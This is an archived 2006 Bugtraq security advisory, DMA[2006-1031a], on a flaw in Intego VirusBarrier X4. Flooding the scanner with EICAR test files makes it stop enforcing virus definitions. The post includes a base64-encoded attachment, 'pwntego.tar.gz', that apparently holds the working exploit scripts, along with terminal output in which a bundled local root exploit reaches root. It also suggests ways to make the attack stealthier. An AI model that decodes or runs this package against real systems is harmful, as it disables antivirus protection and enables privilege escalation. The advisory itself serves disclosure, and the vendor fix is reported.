TUCoPS :: HP Unsorted I :: b06-5764.htm

Intego VirusBarrier X4 definition bypass exploit'] [K F (lists)]
- 'Intego VirusBarrier X4 definition bypass exploit']
- 'Intego VirusBarrier X4 definition bypass exploit']



This is a multi-part message in MIME format.
--------------040909020207030109030404
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit

I think the list spam trap ate this message a few weeks ago.

--------------040909020207030109030404
Content-Type: message/rfc822;
 name*0="DMA[2006-1031a] - 'Intego VirusBarrier X4 definition bypass expl";
 name*1="oit'"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename*0="DMA[2006-1031a] - 'Intego VirusBarrier X4 definition bypass ";
 filename*1="exploit'"

Message-ID: <45528089.9070802@digitalmunition.com> 
Date: Wed, 08 Nov 2006 20:12:41 -0500
From: "K F (lists)"  
User-Agent: Thunderbird 1.5.0.7 (Macintosh/20060909)
MIME-Version: 1.0
To: bugtraq@securityfocus.com 
Subject: DMA[2006-1031a] - 'Intego VirusBarrier X4 definition bypass exploit'
Content-Type: multipart/mixed;
 boundary="------------070901050709080407020707"

This is a multi-part message in MIME format.
--------------070901050709080407020707
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit

This was supposed to go out on Halloween but it didn't... but either way 
all you Mac users can get scared or something. OOGA BOOGA!



--------------070901050709080407020707
Content-Type: application/x-gzip; x-mac-type="477A6970"; x-mac-creator="53495478";
 name="pwntego.tar.gz"
Content-Transfer-Encoding: base64
Content-Disposition: inline;
 filename="pwntego.tar.gz"

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
CyqooIIKKqigggoqqKDvjf4G+9ym4gA0AAA=
--------------070901050709080407020707
Content-Type: text/plain; x-mac-type="54455854"; x-mac-creator="74747874";
 name="DMA[2006-1031a].txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="DMA[2006-1031a].txt"

DMA[2006-1031a] - 'Intego VirusBarrier X4 definition bypass exploit'
Author: Kevin Finisterre
Vendor(s): http://www.intego.com 
Product: 'Intego VirusBarrier X4 <= VirusBarrierX47070.dmg'
References: 
http://www.digitalmunition.com/DMA[2006-1031a].txt 

Description:
Intego VirusBarrier X4 is the simple, fast and non-intrusive antivirus security solution for Macintosh computers, by Intego, the 
leading publisher of personal security software for Macintosh. It offers thorough protection against viruses of all types, coming 
from infected files or applications, whether on CD-ROMs, DVDs or other removable media, or on files downloaded over the Internet 
or other types of networks.

Intego VirusBarrier X4 protects your computer from viruses by constantly examining all the files that your computer opens and 
writes, as well as watching for suspicious activity that may be the sign of viruses acting on applications or other files. With 
Intego VirusBarrier X4 on your computer, you can rest assured that your Macintosh has the best protection available against 
viruses of all kinds.

Although VirusBarrier does a pretty good job of halting malicous activity the product currently suffers from a flaw related to the 
amount of alerts that it can process simultaneously. If an attacker is able to trigger multiple alerts in succession within a very 
short amount of time he or she may be able cause VirusBarrier to completely ignore positive matches against virus definitions. The
consequences of ignored matches may include full system compromise or further spreading of malware.

As an example we will show how VirusBarrier normally stops a local root exploit with behavior similar to 'OSX.ExploitMachex.A', then 
we will demonstrate how the VirusBarrier protection can be bypassed by using a simple flood of Eicar Test files. 

Any typical attempt to access or execute a file or program that is a match for a VirusBarrier definition results in an alert on the
user interface. There is a sweet lookin insulin bottle on the screen that slowly empties as the virus nears eradication. 

'excploit' is infected by 'OSX.ExploitMachex.A' What would you like to do ('Ignore' || 'Repair')? 

Selecting 'Ignore' allows the malicious code to execute as if no AntiVirus program existed at all. 

virusbarrier-users-ibook:/tmp virusbarrieruser$ ./excploit 
uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm), 79(appserverusr), 80(admin)

On the other hand if you chose 'Repair' the process is terminated dead in its tracks and the file is nulled out: 

virusbarrier-users-ibook:/tmp virusbarrieruser$ ./excploit 
-bash: ./excploit: Operation not permitted
virusbarrier-users-ibook:/tmp virusbarrieruser$ ls -al excploit 
-rwxr-xr-x   1 virusbar  wheel  0 Oct 31 02:02 excploit

The above output demonstrates how Virusbarrier is supposed to work. Under normal circumstances this would be adequate to stop a 
malicious attack. 

If however an attacker floods the file system with dummy virus files at a quick rate the VirusBarrier software will promptly stop 
responding after presenting the user with a few audible and visual alerts. After about 40 some odd infected files in a row the 
system will become confused and in some cases VirusBarrier may stop responding completely. (Intego confirmed a limit of 20 files)

When under attack the user may see dozens of messages on the screen. With our example code the messages are similar to the following: 

'0.92815455662033' is infected by 'EICAR Test' What would you like to do ?

>From the attackers standpoint the exploitation is fairly quick and simple. Our example uses a local root exploit however this tactic
could easily be applied to any existing malware technique that Intego VirusBarrier protects against. Code could in theory be run as a 
precurser to an InqTana attack as a means to bypass the Intego protection. The existing signatures for InqTana A B C and D would 
then be completely useless and an E variant would be born. 

virusbarrier-users-ibook:~ virusbarrieruser$ cd ~/Desktop/pwntego
virusbarrier-users-ibook:~/Desktop/pwntego virusbarrieruser$ ls
Pwntego.pl      Pwntego.sh      README.txt      pwntego.uu      rand-eicar.pl
virusbarrier-users-ibook:~/Desktop/pwntego virusbarrieruser$ ./Pwntego.pl 
rm: /tmp/objc_sharing_ppc_92: Permission denied
;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P
;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p
;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p
Injecting pwnacillin shot
;p;P;p;p;p;P;p;p;p;P;p;puid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm), 79(appserverusr), 80(admin)
rm: /tmp/objc_sharing_ppc_92: Permission denied

In the above example 'OSX.ExploitMachex.A' is being executed on a machine that is actively protected by VirusBarrier. In a matter of 
seconds the Intego engine is flooded and the attacker has the ability to completely ignore any Intego virus and malware definitions. 

One fun side effect of this attack is that the user must manually ignore a number of alerts. The users is either forced to Wait for 
each alert to timeout on its own after several seconds or respond individually to each one. 

This attack has a fairly obvious signature in syslog if the attacker is making use of the example code provided in this text. 
Obviousyly using random viruses and better random locations and names is a possible vactor for a crafty attacker.  

virusbarrier-users-ibook:/var/log root# tail -n 30 /var/log/vbmgvx.log 
Tue Oct 31 02:01:59 2006 - File infected: /private/tmp/excploit by OSX.ExploitMachex.A
Tue Oct 31 02:03:35 2006 - File infected: /private/tmp/0.928154556620033 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.61298609695314 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.162308515588851 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.0414842034961147 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.170612903152691 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.663680631042556 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.989461917736666 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.141391639438556 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.767640548831881 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.33160483146003 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.905278172650473 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.694262116056965 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.659224330986948 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.0702005096982283 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.708270066600888 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.59629Vixen08698 by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.56121Nixen47099 by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.56036Rocks!6377 by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.184830066600818 by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.783363853189261 by EICAR Test

With the current fixes in place once VirusBarrier gets 19 alerts, the next malware is simply quarantined until the administrator can
repair them. In our example, the additional processes get a permission error when they are executed.

Of course since everyone knows there is no malware for Macintosh this scenario would quite simply never be encountered..... *smirk* 

The Intego staff was more than helpful and willing to address this issue in a timely fashion. After communications were established
this problem was addressed, and fixes were out the door to customers in a matter of 2 days. How about that for turn around time!

Workaround: 

Please update to the latest version of Intego Virus Barrier and the latest Vdefs. 
http://www.intego.com/services/updates.asp?product=VirusBarrier 

Intego has fixed this bug in the 2006/11/01 Vdef files.





--------------070901050709080407020707--


--------------040909020207030109030404--

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH